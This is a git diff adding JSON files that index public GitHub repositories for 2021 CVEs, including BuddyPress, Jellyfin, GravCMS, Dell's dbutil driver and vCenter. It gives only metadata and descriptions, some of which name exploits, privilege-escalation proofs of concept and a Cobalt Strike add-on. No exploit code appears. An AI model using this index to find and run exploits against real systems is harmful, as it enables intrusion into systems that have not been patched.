+ "description": "BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.",
+ "fork": false,
+ "created_at": "2021-05-31T14:12:26Z",
+ "updated_at": "2024-04-02T17:49:38Z",
+ "pushed_at": "2021-05-31T14:16:20Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21402.json b/2021/CVE-2021-21402.json
new file mode 100644
index 0000000000..3beb84cefd
--- /dev/null
+++ b/2021/CVE-2021-21402.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 356203698,
+ "name": "CVE-2021-21402-Jellyfin",
+ "full_name": "jiaocoll\/CVE-2021-21402-Jellyfin",
+ "owner": {
+ "login": "jiaocoll",
+ "id": 62785738,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62785738?v=4",
+ "html_url": "https:\/\/github.com\/jiaocoll"
+ },
+ "html_url": "https:\/\/github.com\/jiaocoll\/CVE-2021-21402-Jellyfin",
+ "description": "CVE-2021-21402-Jellyfin-任意文件读取",
+ "fork": false,
+ "created_at": "2021-04-09T08:54:55Z",
+ "updated_at": "2021-04-10T03:10:17Z",
+ "pushed_at": "2021-04-10T03:10:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 358308476,
+ "name": "CVE-2021-21402",
+ "full_name": "somatrasss\/CVE-2021-21402",
+ "owner": {
+ "login": "somatrasss",
+ "id": 69829610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4",
+ "html_url": "https:\/\/github.com\/somatrasss"
+ },
+ "html_url": "https:\/\/github.com\/somatrasss\/CVE-2021-21402",
+ "description": "本项目涉及到的仅为安全研究和授权情况下使用,其使用人员有责任和义务遵守当地法律条规。",
+ "fork": false,
+ "created_at": "2021-04-15T15:32:39Z",
+ "updated_at": "2023-09-28T11:26:50Z",
+ "pushed_at": "2021-04-15T15:51:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 358484211,
+ "name": "CVE-2021-21402",
+ "full_name": "givemefivw\/CVE-2021-21402",
+ "owner": {
+ "login": "givemefivw",
+ "id": 65514141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4",
+ "html_url": "https:\/\/github.com\/givemefivw"
+ },
+ "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-21402",
+ "description": "CVE-2021-21402 Jellyfin任意文件读取 Wker脚本,可批量。",
+ "fork": false,
+ "created_at": "2021-04-16T05:20:20Z",
+ "updated_at": "2021-04-16T06:04:51Z",
+ "pushed_at": "2021-04-16T05:24:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21403.json b/2021/CVE-2021-21403.json
new file mode 100644
index 0000000000..ef551680a3
--- /dev/null
+++ b/2021/CVE-2021-21403.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595841014,
+ "name": "CVE-2021-21403",
+ "full_name": "5l1v3r1\/CVE-2021-21403",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-21403",
+ "description": "Jellyfin系统任意文件读取漏洞批量扫描验证脚本。",
+ "fork": false,
+ "created_at": "2023-01-31T23:07:53Z",
+ "updated_at": "2023-07-25T08:02:41Z",
+ "pushed_at": "2021-04-08T07:49:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21425.json b/2021/CVE-2021-21425.json
new file mode 100644
index 0000000000..23c86884e7
--- /dev/null
+++ b/2021/CVE-2021-21425.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 379927795,
+ "name": "CVE-2021-21425",
+ "full_name": "CsEnox\/CVE-2021-21425",
+ "owner": {
+ "login": "CsEnox",
+ "id": 60170196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4",
+ "html_url": "https:\/\/github.com\/CsEnox"
+ },
+ "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-21425",
+ "description": "GravCMS Unauthenticated Arbitrary YAML Write\/Update leads to Code Execution (CVE-2021-21425)",
+ "fork": false,
+ "created_at": "2021-06-24T13:06:24Z",
+ "updated_at": "2024-02-16T16:29:45Z",
+ "pushed_at": "2023-04-18T16:30:34Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 449798666,
+ "name": "GravCMS_Nmap_Script",
+ "full_name": "frknktlca\/GravCMS_Nmap_Script",
+ "owner": {
+ "login": "frknktlca",
+ "id": 39772097,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39772097?v=4",
+ "html_url": "https:\/\/github.com\/frknktlca"
+ },
+ "html_url": "https:\/\/github.com\/frknktlca\/GravCMS_Nmap_Script",
+ "description": "It is a nmap script for GravCMS vulnerability (CVE-2021-21425)",
+ "fork": false,
+ "created_at": "2022-01-19T17:54:19Z",
+ "updated_at": "2022-01-19T17:55:58Z",
+ "pushed_at": "2022-01-19T17:58:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21514.json b/2021/CVE-2021-21514.json
new file mode 100644
index 0000000000..1e2b6b4e88
--- /dev/null
+++ b/2021/CVE-2021-21514.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 572725685,
+ "name": "AFR-in-OMSA",
+ "full_name": "und3sc0n0c1d0\/AFR-in-OMSA",
+ "owner": {
+ "login": "und3sc0n0c1d0",
+ "id": 32236059,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4",
+ "html_url": "https:\/\/github.com\/und3sc0n0c1d0"
+ },
+ "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/AFR-in-OMSA",
+ "description": "Validation of Arbitrary File Read Vulnerabilities in Dell OpenManage Server Administrator (OMSA) - CVE-2016-4004, CVE-2021-21514 and CVE-2020-5377.",
+ "fork": false,
+ "created_at": "2022-11-30T22:34:58Z",
+ "updated_at": "2024-05-21T19:14:18Z",
+ "pushed_at": "2022-12-01T06:36:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21551.json b/2021/CVE-2021-21551.json
new file mode 100644
index 0000000000..29ed7b03fd
--- /dev/null
+++ b/2021/CVE-2021-21551.json
@@ -0,0 +1,265 @@
+[
+ {
+ "id": 367056155,
+ "name": "CVE-2021-21551",
+ "full_name": "waldo-irc\/CVE-2021-21551",
+ "owner": {
+ "login": "waldo-irc",
+ "id": 10516272,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10516272?v=4",
+ "html_url": "https:\/\/github.com\/waldo-irc"
+ },
+ "html_url": "https:\/\/github.com\/waldo-irc\/CVE-2021-21551",
+ "description": "Exploit to SYSTEM for CVE-2021-21551",
+ "fork": false,
+ "created_at": "2021-05-13T13:23:38Z",
+ "updated_at": "2024-05-23T01:36:02Z",
+ "pushed_at": "2021-05-20T20:33:09Z",
+ "stargazers_count": 237,
+ "watchers_count": 237,
+ "has_discussions": false,
+ "forks_count": 43,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 43,
+ "watchers": 237,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 369400184,
+ "name": "CVE-2021-21551",
+ "full_name": "ch3rn0byl\/CVE-2021-21551",
+ "owner": {
+ "login": "ch3rn0byl",
+ "id": 13082307,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13082307?v=4",
+ "html_url": "https:\/\/github.com\/ch3rn0byl"
+ },
+ "html_url": "https:\/\/github.com\/ch3rn0byl\/CVE-2021-21551",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-21T03:13:58Z",
+ "updated_at": "2024-06-11T20:38:26Z",
+ "pushed_at": "2021-05-21T03:24:25Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 371617838,
+ "name": "PS-CVE-2021-21551",
+ "full_name": "arnaudluti\/PS-CVE-2021-21551",
+ "owner": {
+ "login": "arnaudluti",
+ "id": 41639163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41639163?v=4",
+ "html_url": "https:\/\/github.com\/arnaudluti"
+ },
+ "html_url": "https:\/\/github.com\/arnaudluti\/PS-CVE-2021-21551",
+ "description": "Script to patch your domain computers about the CVE-2021-21551. Privesc on machines that have the driver dbutil_2_3.sys, installed by some DELL tools (BIOS updater, SupportAssist...)",
+ "fork": false,
+ "created_at": "2021-05-28T07:29:40Z",
+ "updated_at": "2021-06-20T11:02:49Z",
+ "pushed_at": "2021-06-20T11:02:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 372182222,
+ "name": "CVE-2021-21551",
+ "full_name": "mathisvickie\/CVE-2021-21551",
+ "owner": {
+ "login": "mathisvickie",
+ "id": 60326914,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60326914?v=4",
+ "html_url": "https:\/\/github.com\/mathisvickie"
+ },
+ "html_url": "https:\/\/github.com\/mathisvickie\/CVE-2021-21551",
+ "description": "arbitrary kernel read\/write in dbutil_2_3.sys, Proof of Concept Local Privilege Escalation to nt authority\/system",
+ "fork": false,
+ "created_at": "2021-05-30T10:15:10Z",
+ "updated_at": "2024-06-06T22:11:37Z",
+ "pushed_at": "2021-11-16T17:34:11Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-21551",
+ "dbutil",
+ "dell",
+ "dell-driver",
+ "driver",
+ "exploit",
+ "kernel",
+ "kernel-driver",
+ "local-privilege-escalation",
+ "poc",
+ "privilege-escalation",
+ "proof-of-concept",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 373047111,
+ "name": "CVE-2021-21551-POC",
+ "full_name": "mzakocs\/CVE-2021-21551-POC",
+ "owner": {
+ "login": "mzakocs",
+ "id": 48490301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48490301?v=4",
+ "html_url": "https:\/\/github.com\/mzakocs"
+ },
+ "html_url": "https:\/\/github.com\/mzakocs\/CVE-2021-21551-POC",
+ "description": "An extended proof-of-concept for the CVE-2021-21551 Dell ‘dbutil_2_3.sys’ Kernel Exploit",
+ "fork": false,
+ "created_at": "2021-06-02T05:13:07Z",
+ "updated_at": "2024-04-28T13:02:18Z",
+ "pushed_at": "2021-07-20T03:03:30Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402614345,
+ "name": "Dell-Driver-EoP-CVE-2021-21551",
+ "full_name": "ihack4falafel\/Dell-Driver-EoP-CVE-2021-21551",
+ "owner": {
+ "login": "ihack4falafel",
+ "id": 17316888,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17316888?v=4",
+ "html_url": "https:\/\/github.com\/ihack4falafel"
+ },
+ "html_url": "https:\/\/github.com\/ihack4falafel\/Dell-Driver-EoP-CVE-2021-21551",
+ "description": "Dell Driver EoP (CVE-2021-21551)",
+ "fork": false,
+ "created_at": "2021-09-03T01:47:03Z",
+ "updated_at": "2023-10-25T16:58:33Z",
+ "pushed_at": "2022-02-24T10:13:45Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 507289591,
+ "name": "kernel-mii",
+ "full_name": "tijme\/kernel-mii",
+ "owner": {
+ "login": "tijme",
+ "id": 5873573,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5873573?v=4",
+ "html_url": "https:\/\/github.com\/tijme"
+ },
+ "html_url": "https:\/\/github.com\/tijme\/kernel-mii",
+ "description": "Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.",
+ "fork": false,
+ "created_at": "2022-06-25T11:13:45Z",
+ "updated_at": "2024-06-21T10:59:42Z",
+ "pushed_at": "2023-05-07T18:38:29Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "beacon",
+ "bof",
+ "cobalt-strike",
+ "cve-2021-21551",
+ "exploit",
+ "kernel",
+ "red-teaming"
+ ],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 586124071,
+ "name": "CVE-2021-21551",
+ "full_name": "nanabingies\/CVE-2021-21551",
+ "owner": {
+ "login": "nanabingies",
+ "id": 13157335,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13157335?v=4",
+ "html_url": "https:\/\/github.com\/nanabingies"
+ },
+ "html_url": "https:\/\/github.com\/nanabingies\/CVE-2021-21551",
+ "description": "Dell Driver EoP (CVE-2021-21551)",
+ "fork": false,
+ "created_at": "2023-01-07T02:42:59Z",
+ "updated_at": "2024-05-07T05:29:37Z",
+ "pushed_at": "2023-02-03T22:31:46Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21716.json b/2021/CVE-2021-21716.json
new file mode 100644
index 0000000000..0e8e13f7cc
--- /dev/null
+++ b/2021/CVE-2021-21716.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 714215346,
+ "name": "CVE-2023-21716-EXPLOIT.py",
+ "full_name": "MojithaR\/CVE-2023-21716-EXPLOIT.py",
+ "owner": {
+ "login": "MojithaR",
+ "id": 127576267,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4",
+ "html_url": "https:\/\/github.com\/MojithaR"
+ },
+ "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-21716-EXPLOIT.py",
+ "description": "This is an exploit file which is used to check CVE-2021-21716 vulnerability",
+ "fork": false,
+ "created_at": "2023-11-04T08:49:14Z",
+ "updated_at": "2024-06-23T14:56:12Z",
+ "pushed_at": "2023-11-05T12:23:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2173.json b/2021/CVE-2021-2173.json
new file mode 100644
index 0000000000..fbb93ac901
--- /dev/null
+++ b/2021/CVE-2021-2173.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 373735692,
+ "name": "CVE-2021-2173",
+ "full_name": "emad-almousa\/CVE-2021-2173",
+ "owner": {
+ "login": "emad-almousa",
+ "id": 48997609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4",
+ "html_url": "https:\/\/github.com\/emad-almousa"
+ },
+ "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-2173",
+ "description": "CVE-2021-2173",
+ "fork": false,
+ "created_at": "2021-06-04T05:56:01Z",
+ "updated_at": "2023-09-28T11:28:20Z",
+ "pushed_at": "2021-06-04T05:57:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2175.json b/2021/CVE-2021-2175.json
new file mode 100644
index 0000000000..428fd6f8cc
--- /dev/null
+++ b/2021/CVE-2021-2175.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 454859304,
+ "name": "CVE-2021-2175",
+ "full_name": "emad-almousa\/CVE-2021-2175",
+ "owner": {
+ "login": "emad-almousa",
+ "id": 48997609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4",
+ "html_url": "https:\/\/github.com\/emad-almousa"
+ },
+ "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-2175",
+ "description": "CVE-2021-2175",
+ "fork": false,
+ "created_at": "2022-02-02T16:53:35Z",
+ "updated_at": "2022-02-02T16:56:30Z",
+ "pushed_at": "2022-02-02T16:54:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-2175"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21809.json b/2021/CVE-2021-21809.json
new file mode 100644
index 0000000000..507bf276ec
--- /dev/null
+++ b/2021/CVE-2021-21809.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 580210985,
+ "name": "CVE-2021-21809",
+ "full_name": "anldori\/CVE-2021-21809",
+ "owner": {
+ "login": "anldori",
+ "id": 101538840,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4",
+ "html_url": "https:\/\/github.com\/anldori"
+ },
+ "html_url": "https:\/\/github.com\/anldori\/CVE-2021-21809",
+ "description": "CVE-2021-21809 POC",
+ "fork": false,
+ "created_at": "2022-12-20T01:44:49Z",
+ "updated_at": "2023-01-31T22:23:21Z",
+ "pushed_at": "2022-12-20T07:03:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21972.json b/2021/CVE-2021-21972.json
new file mode 100644
index 0000000000..cbf6ecea17
--- /dev/null
+++ b/2021/CVE-2021-21972.json
@@ -0,0 +1,877 @@
+[
+ {
+ "id": 246641886,
+ "name": "NSE-scripts",
+ "full_name": "psc4re\/NSE-scripts",
+ "owner": {
+ "login": "psc4re",
+ "id": 4672886,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4672886?v=4",
+ "html_url": "https:\/\/github.com\/psc4re"
+ },
+ "html_url": "https:\/\/github.com\/psc4re\/NSE-scripts",
+ "description": "NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473",
+ "fork": false,
+ "created_at": "2020-03-11T17:51:29Z",
+ "updated_at": "2023-10-03T03:56:45Z",
+ "pushed_at": "2021-08-16T18:16:20Z",
+ "stargazers_count": 159,
+ "watchers_count": 159,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-1350",
+ "cve-2021-21972",
+ "cve-2021-34473",
+ "nmap",
+ "nmap-scan-script",
+ "nmap-scripts",
+ "nse-script",
+ "poc",
+ "proxyshell",
+ "scanner",
+ "sigred",
+ "smbghost",
+ "smbv3",
+ "vcenter",
+ "vulnerability",
+ "vulnerability-detection"
+ ],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 159,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 341854126,
+ "name": "CVE-2021-21972-vCenter-6.5-7.0-RCE-POC",
+ "full_name": "QmF0c3UK\/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC",
+ "owner": {
+ "login": "QmF0c3UK",
+ "id": 29447678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4",
+ "html_url": "https:\/\/github.com\/QmF0c3UK"
+ },
+ "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-24T09:56:21Z",
+ "updated_at": "2024-06-25T06:12:46Z",
+ "pushed_at": "2021-03-01T02:10:44Z",
+ "stargazers_count": 136,
+ "watchers_count": 136,
+ "has_discussions": false,
+ "forks_count": 64,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 64,
+ "watchers": 136,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 341874677,
+ "name": "CVE-2021-21972",
+ "full_name": "NS-Sp4ce\/CVE-2021-21972",
+ "owner": {
+ "login": "NS-Sp4ce",
+ "id": 33349032,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4",
+ "html_url": "https:\/\/github.com\/NS-Sp4ce"
+ },
+ "html_url": "https:\/\/github.com\/NS-Sp4ce\/CVE-2021-21972",
+ "description": "CVE-2021-21972 Exploit",
+ "fork": false,
+ "created_at": "2021-02-24T11:14:58Z",
+ "updated_at": "2024-06-24T03:38:10Z",
+ "pushed_at": "2023-06-08T04:01:33Z",
+ "stargazers_count": 475,
+ "watchers_count": 475,
+ "has_discussions": false,
+ "forks_count": 148,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21972"
+ ],
+ "visibility": "public",
+ "forks": 148,
+ "watchers": 475,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 341907086,
+ "name": "CVE-2021-21972",
+ "full_name": "yaunsky\/CVE-2021-21972",
+ "owner": {
+ "login": "yaunsky",
+ "id": 48243087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4",
+ "html_url": "https:\/\/github.com\/yaunsky"
+ },
+ "html_url": "https:\/\/github.com\/yaunsky\/CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-24T13:19:41Z",
+ "updated_at": "2023-06-15T22:00:13Z",
+ "pushed_at": "2021-02-24T13:36:28Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 341963506,
+ "name": "CVE-2021-21972",
+ "full_name": "horizon3ai\/CVE-2021-21972",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-21972",
+ "description": "Proof of Concept Exploit for vCenter CVE-2021-21972",
+ "fork": false,
+ "created_at": "2021-02-24T16:31:34Z",
+ "updated_at": "2024-06-05T16:37:21Z",
+ "pushed_at": "2021-02-25T16:05:02Z",
+ "stargazers_count": 247,
+ "watchers_count": 247,
+ "has_discussions": false,
+ "forks_count": 86,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 86,
+ "watchers": 247,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 342109140,
+ "name": "westone-CVE-2021-21972-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-21972-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-21972-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-21972 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-02-25T03:19:25Z",
+ "updated_at": "2021-03-20T07:55:11Z",
+ "pushed_at": "2021-03-20T07:55:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 342129970,
+ "name": "CVE-2021-21972",
+ "full_name": "alt3kx\/CVE-2021-21972",
+ "owner": {
+ "login": "alt3kx",
+ "id": 3140111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4",
+ "html_url": "https:\/\/github.com\/alt3kx"
+ },
+ "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-25T05:10:06Z",
+ "updated_at": "2024-06-24T03:32:02Z",
+ "pushed_at": "2021-02-25T05:49:19Z",
+ "stargazers_count": 55,
+ "watchers_count": 55,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 55,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 342131182,
+ "name": "CVE-2021-21972",
+ "full_name": "milo2012\/CVE-2021-21972",
+ "owner": {
+ "login": "milo2012",
+ "id": 905335,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/905335?v=4",
+ "html_url": "https:\/\/github.com\/milo2012"
+ },
+ "html_url": "https:\/\/github.com\/milo2012\/CVE-2021-21972",
+ "description": "CVE-2021-21972",
+ "fork": false,
+ "created_at": "2021-02-25T05:16:38Z",
+ "updated_at": "2023-05-04T18:23:14Z",
+ "pushed_at": "2021-03-01T03:38:00Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
